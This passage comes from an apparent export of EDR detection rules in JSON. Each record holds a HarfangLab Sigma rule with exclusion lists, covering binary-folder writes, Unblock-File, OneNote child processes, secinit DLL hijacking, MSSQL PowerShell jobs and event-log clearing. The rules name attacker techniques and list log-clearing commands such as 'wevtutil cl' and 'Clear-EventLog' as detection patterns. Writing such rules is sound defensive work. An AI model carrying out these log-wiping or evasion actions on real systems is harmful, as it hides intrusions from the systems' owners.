'/elastic-agent install --url='\n Path: '/usr/bin/elastic-agent'\n\n exclusion_temp_file:\n - ProcessImage:\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n Path|endswith:\n - '.swp'\n - '.swx'\n - ProcessImage: '/usr/bin/sed'\n Path: '/usr/bin/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/usr/bin/sed??????'\n\n exclusion_commvault:\n ProcessImage|endswith: '/commvault/.gxsetup/silent_install/install'\n\n exclusion_pum_worker:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? 
-Estt /usr/local/psa/admin/sbin/pum_worker '\n - '/usr/libexec/platform-python -Estt /usr/local/psa/admin/sbin/pum_worker '\n\n exclusion_microdnf:\n ProcessImage: '/usr/bin/microdnf'\n\n exclusion_touch:\n ProcessImage: '/usr/bin/touch'\n\n exclusion_make:\n - ProcessImage: '/usr/bin/cmake'\n - ProcessAncestors|contains: '|/usr/bin/make|'\n\n exclusion_vmware:\n ProcessCommandLine:\n - '/usr/bin/perl -w ./vmware-install.pl --default'\n - '/usr/bin/perl -w /usr/bin/vmware-config-tools.pl --default --log-answers --rpc-on-end --preserve --installing'\n Path:\n - '/usr/bin/vm-support'\n - '/usr/bin/vmware-uninstall-tools.pl'\n - '/usr/bin/vmware-config-tools.pl'\n - '/sbin/mount.vmhgfs'\n - '/usr/sbin/mount.vmhgfs'\n\n exclusion_plesk:\n ProcessCommandLine|startswith:\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install '\n - '/usr/libexec/platform-python -Estt /usr/local/psa/bin/dnf_install '\n\n exclusion_image:\n ProcessImage:\n - '/usr/bin/pamac-daemon'\n - '/opt/saltstack/salt/bin/python*'\n - '/usr/bin/lua'\n - '/usr/bin/install'\n - '/usr/bin/tar'\n - '/usr/sbin/prelink'\n\n exclusion_vim:\n ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n Path|endswith:\n - '.swp'\n - '.swpx'\n\n exclusion_aws:\n ProcessAncestors|contains: '/install_agent|*/aws-replication-installer-init|'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c3f0f0f-0082-4863-ba3a-b9b746772135",
"rule_name": "Suspicious Write in the Binary Folder",
"rule_description": "Detects a suspicious write to one of the common binary folders (\"/bin/\", \"/sbin/\", \"/usr/bin/\", \"/usr/sbin/\").\nAdversaries may try to match the name of a legitimate system binary when creating a malicious executable.\nIt is recommended to ensure that the process writing to those directories is a legitimate installer and that the file being installed isn't malicious.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1036.005",
"attack.t1554"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c6a55b5-b600-4835-83fb-e4aa42b6a014",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621805Z",
"creation_date": "2026-03-23T11:45:34.621807Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621811Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file",
"https://www.logpoint.com/en/blog/hunting-and-remediating-blackcat-ransomware/",
"https://attack.mitre.org/techniques/T1553/005/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1553_005_powershell_suspicious_unblock_cmdlet.yml",
"content": "title: Suspicious Unblock-File cmdlet via PowerShell\nid: 5c6a55b5-b600-4835-83fb-e4aa42b6a014\ndescription: |\n Detects the suspicious usage of the Unblock-File PowerShell cmdlet.\n This cmdlet removes the Zone.Identifier alternate data stream from a file.\n This alternate data stream can have a value of 3 indicating that it was downloaded from the internet.\n This technique can be used to unblock PowerShell script files to avoid opening them in protected view.\n It is recommended to investigate the execution chain of the process calling the Unblock-File cmdlet to look for malicious behavior.\nreferences:\n - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file\n - https://www.logpoint.com/en/blog/hunting-and-remediating-blackcat-ransomware/\n - https://attack.mitre.org/techniques/T1553/005/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/06/14\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.005\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\n\ndetection:\n selection:\n PowershellCommand|contains: 'Unblock-File '\n\n exclusion_ixbus:\n ProcessCommandLine: 'Powershell.exe -executionpolicy unrestricted -File ?:\\\\*\\iXBus Serveur\\\\*'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k 
UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_image:\n ProcessParentImage: '?:\\Program Files (x86)\\DesktopCentral_Agent\\bin\\dctask64.exe'\n\n exclusion_commandline:\n - ProcessCommandLine|contains: '\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\'\n - ProcessParentCommandLine|contains:\n - '\\Program Files (x86)\\FOG\\FOGService.exe'\n - '\\flutter\\bin\\'\n - '\\sysmgmt\\sd_store\\\\*\\precheck'\n - ProcessGrandparentCommandLine|contains: '\\Windows\\AdminArsenal\\PDQDeployRunner\\'\n\n exclusion_ccm:\n PowershellScriptPath|startswith: '?:\\WINDOWS\\ccmcache\\'\n ProcessAncestors|contains: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c6a55b5-b600-4835-83fb-e4aa42b6a014",
"rule_name": "Suspicious Unblock-File cmdlet via PowerShell",
"rule_description": "Detects the suspicious usage of the Unblock-File PowerShell cmdlet.\nThis cmdlet removes the Zone.Identifier alternate data stream from a file.\nThis alternate data stream can have a value of 3 indicating that it was downloaded from the internet.\nThis technique can be used to unblock PowerShell script files to avoid opening them in protected view.\nIt is recommended to investigate the execution chain of the process calling the Unblock-File cmdlet to look for malicious behavior.\n",
"rule_creation_date": "2022-06-14",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1553.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c90af83-d510-4bab-9999-c5318f2ae93e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073838Z",
"creation_date": "2026-03-23T11:45:34.073840Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073845Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://opalsec.substack.com/p/the-defenders-guide-to-onenote-maldocs",
"https://blog.sevagas.com/IMG/pdf/redteam_with_onenote.pdf",
"https://attack.mitre.org/techniques/T1566/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_onenote_parent.yml",
"content": "title: Suspicious Process Spawned by Microsoft OneNote\nid: 5c90af83-d510-4bab-9999-c5318f2ae93e\ndescription: |\n Detects a suspicious child process started from the Microsoft OneNote application.\n OneNote has become, since the beginning of the year 2023, a fixture in malware delivery, generally used by tricking an user to click on embedded malicious files (hta, exe, ppt...).\n Other files such as JavaScript (.js) or VisualBasic (.vbe) can be used as well.\n It is recommended to investigate the process spawned by OneNote and other potentially malicious activities on the machine.\nreferences:\n - https://opalsec.substack.com/p/the-defenders-guide-to-onenote-maldocs\n - https://blog.sevagas.com/IMG/pdf/redteam_with_onenote.pdf\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/02/06\nmodified: 2025/04/18\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\ONENOTE.EXE'\n CurrentDirectory|contains:\n - '\\Exported'\n - '\\onenoteofflinecache_files'\n\n filter_browsers:\n OriginalFileName:\n - 'msedge.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'firefox.exe'\n - 'iexplore.exe'\n - 'librewolf.exe'\n - 'chromium.exe'\n - 'safari.exe'\n filter_office:\n OriginalFileName:\n - 'EXCEL.EXE'\n - 'OUTLOOK.EXE'\n - 'FileCoAuth.exe' # Outlook\n - 'ONENOTEM.EXE'\n - 'OneNote.exe'\n - 'WINWORD.EXE'\n - 'POWERPNT.EXE'\n - 'CLVIEW.exe'\n - 'VISIO.EXE'\n filter_pdf_readers:\n - OriginalFileName:\n - 'Acrobat.exe'\n - 'AcroRd32.exe'\n - 'FoxitPDFReader.EXE'\n - 'Foxit Reader.EXE'\n - 'Nitro Pro'\n - 'soda.exe'\n - 
'GaaihoDoc.exe'\n - Signature: 'FOXIT SOFTWARE INC.'\n\n exclusion_programfiles:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n\n exclusion_fontview:\n ProcessImage:\n - '?:\\Windows\\System32\\fontview.exe'\n - '?:\\Windows\\SysWOW64\\fontview.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_xpsrchvw:\n ProcessImage:\n - '?:\\Windows\\System32\\xpsrchvw.exe'\n - '?:\\Windows\\SysWOW64\\xpsrchvw.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_mspaint:\n ProcessImage:\n - '?:\\Windows\\System32\\mspaint.exe'\n - '?:\\Windows\\SysWOW64\\mspaint.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_notepad:\n ProcessImage:\n - '?:\\Windows\\System32\\notepad.exe'\n - '?:\\Windows\\SysWOW64\\notepad.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_code:\n ProcessOriginalFileName: 'electron.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_pdf:\n Image|endswith: '\\PDF Viewer\\PDFXCview.exe'\n ProcessOriginalFileName: 'PDFXCview.exe'\n\n exclusion_xmind:\n ProcessInternalName: 'Xmind'\n ProcessSigned: 'true'\n ProcessSignature: 'XMind Ltd.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c90af83-d510-4bab-9999-c5318f2ae93e",
"rule_name": "Suspicious Process Spawned by Microsoft OneNote",
"rule_description": "Detects a suspicious child process started from the Microsoft OneNote application.\nOneNote has become, since the beginning of the year 2023, a fixture in malware delivery, generally used by tricking a user into clicking on embedded malicious files (hta, exe, ppt...).\nOther files such as JavaScript (.js) or VisualBasic (.vbe) can be used as well.\nIt is recommended to investigate the process spawned by OneNote and other potentially malicious activities on the machine.\n",
"rule_creation_date": "2023-02-06",
"rule_modified_date": "2025-04-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1218",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ccea6af-f31b-4f4c-8750-a0295d7ea415",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081792Z",
"creation_date": "2026-03-23T11:45:34.081794Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081798Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_secinit.yml",
"content": "title: DLL Hijacking via secinit.exe\nid: 5ccea6af-f31b-4f4c-8750-a0295d7ea415\ndescription: |\n Detects potential Windows DLL Hijacking via secinit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'secinit'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ccea6af-f31b-4f4c-8750-a0295d7ea415",
"rule_name": "DLL Hijacking via secinit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via secinit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate executable and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ced6f26-1cff-41ca-aa7a-fcd4bfb178f7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606772Z",
"creation_date": "2026-03-23T11:45:34.606775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606783Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-powershell-script-job-step?view=sql-server-2016",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_job_powershell.yml",
"content": "title: Execution of a Suspicious MSSQL PowerShell Job\nid: 5ced6f26-1cff-41ca-aa7a-fcd4bfb178f7\ndescription: |\n Detects the execution of a MSSQL job using the PowerShell subsystem.\n Attackers may execute a PowerShell job in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-powershell-script-job-step?view=sql-server-2016\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/07/23\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\sqlps.exe'\n\n filter_mssql:\n Image|endswith:\n - '\\Tools\\Binn\\sqlcmd.exe'\n - '\\Tools\\Binn\\bcp.exe'\n - '\\Tools\\Binn\\SQLPS.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n filter_conhost:\n Image:\n - '?:\\WINDOWS\\system32\\conhost.exe'\n - '?:\\WINDOWS\\syswow64\\conhost.exe'\n CommandLine:\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1'\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff'\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0x4'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\Syswow64\\WerFault.exe'\n\n exclusion_divalto: # ERP solution\n - Image|endswith: 
'\\ERP-DIVALTO\\EchangeERP\\DivaComSiplace.exe'\n - Image: '?:\\Windows\\System32\\WScript.exe'\n CommandLine|contains: '\\ERP-DIVALTO\\EchangeERP\\'\n\n exclusion_nsca:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c *\\NSCA\\check_nsca.bat *;check_*'\n\n exclusion_image:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\System32\\fondue.exe'\n - '?:\\ProgramData\\anaconda3\\python.exe'\n - '?:\\Windows\\System32\\pcaui.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\dw20.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\dw20.exe'\n\n exclusion_shimadzu:\n CommandLine: '?:\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -command New-Item -ItemType Directory -Force -Path ??:\\Program Files\\Shimadzu Corporation\\MALDI Solutions\\Database\\\\\\\\Backups?'\n\n exclusion_forfiles:\n Image: '?:\\Windows\\System32\\forfiles.exe'\n CommandLine|contains: '/C cmd /c del @file'\n\n exclusion_cmd:\n CommandLine|startswith:\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files\\'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files (x86)\\'\n\n exclusion_generic_scripts_folder:\n CommandLine|contains:\n - 'powershell.exe D:*\\Scripts'\n - 'pwsh.exe D:*\\Scripts'\n - 'powershell.exe -file D:*\\Scripts'\n - 'pwsh.exe -file D:*\\Scripts'\n\n exclusion_vsjitdebugger:\n CommandLine|startswith: '?:\\windows\\system32\\vsjitdebugger.exe PID '\n\n exclusion_python:\n CommandLine: '?:\\Tools\\python???\\python.exe ?:*.py'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ced6f26-1cff-41ca-aa7a-fcd4bfb178f7",
"rule_name": "Execution of a Suspicious MSSQL PowerShell Job",
"rule_description": "Detects the execution of an MSSQL job using the PowerShell subsystem.\nAttackers may execute a PowerShell job in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check whether this behavior is expected and to look for malicious activity stemming from the newly created process.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5cf9b4f6-6f3b-4d0b-a178-9570cce9693d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595518Z",
"creation_date": "2026-03-23T11:45:34.595521Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595529Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/",
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_eventlog.yml",
"content": "title: Windows Event Logs Cleared\nid: 5cf9b4f6-6f3b-4d0b-a178-9570cce9693d\ndescription: |\n Detects when one of the Windows event logs is cleared through wevutil or PowerShell.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n Windows Event Logs are a record of a computer's alerts and notifications.\n It is recommended to analyze the parent process to look for malicious content or actions.\nreferences:\n - https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2021/04/27\nmodified: 2025/10/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_wevtutil_1:\n - Image|endswith: '\\wevtutil.exe'\n - OriginalFileName: 'wevtutil.exe'\n\n selection_wevtutil_2:\n - CommandLine|contains:\n - ' clear-log '\n - ' cl '\n\n selection_ps_1:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_ps_2:\n - CommandLine|contains:\n - ' Clear-EventLog '\n - ' Remove-EventLog '\n\n selection_wmic_1:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_wmic_2:\n - CommandLine|contains: ' ClearEventLog'\n\n exclusion_citrix:\n CommandLine|startswith: '?:\\Windows\\system32\\wevtutil.exe cl '\n ParentCommandLine:\n - '*\\CitrixOptimizerTool\\CitrixOptimizerTool.exe'\n - '*\\CitrixOptimizerTool_*\\CitrixOptimizerTool.exe'\n - '?:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe *CtxOptimizerEngine.ps1 -Source *Citrix_Windows_*.xml -Mode Execute*'\n - '?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\Citrix.Wem.Agent.Service.exe'\n - '*\\citrixoptimizer\\citrixoptimizertool.exe'\n\n 
exclusion_vda_cloning_orchestrator:\n GrandparentCommandLine: '?:\\Windows\\System32\\cscript.exe ?:\\VDA Cloning Orchestrator\\VDA Cloning Orchestrator.vbs'\n\n exclusion_bisf:\n GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files\\Base Image Script Framework (BIS-F)\\PrepareBaseImage.cmd'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\PrepareBaseImage.cmd'\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n\n exclusion_cleanmgr:\n GrandparentCommandLine|endswith:\n - '\\CLEANMGR+\\Cleanmgr+.exe'\n - '\\CLEANMGR+\\cleanmgrplus\\Cleanmgr+.exe'\n - '\\Cleanmgr+ v*\\Cleanmgr+.exe'\n\n exclusion_atera:\n GrandparentImage: '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\AgentPackageSystemTools.exe'\n\n exclusion_fsecure_uninstaller:\n CommandLine: 'wevtutil cl FSecureUltralightSDK'\n ParentImage: '?:\\Windows\\Temp\\FS_UL_?\\fs*.tmp\\uninstall.exe'\n\n exclusion_privazer:\n Ancestors|contains: '\\PrivaZer\\PrivaZer v*.exe|'\n\n condition: ((all of selection_wevtutil_*) or (all of selection_ps_*) or (all of selection_wmic_*)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5cf9b4f6-6f3b-4d0b-a178-9570cce9693d",
"rule_name": "Windows Event Logs Cleared",
"rule_description": "Detects when one of the Windows event logs is cleared through wevtutil or PowerShell.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nWindows Event Logs are a record of a computer's alerts and notifications.\nIt is recommended to analyze the parent process to look for malicious content or actions.\n",
"rule_creation_date": "2021-04-27",
"rule_modified_date": "2025-10-21",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
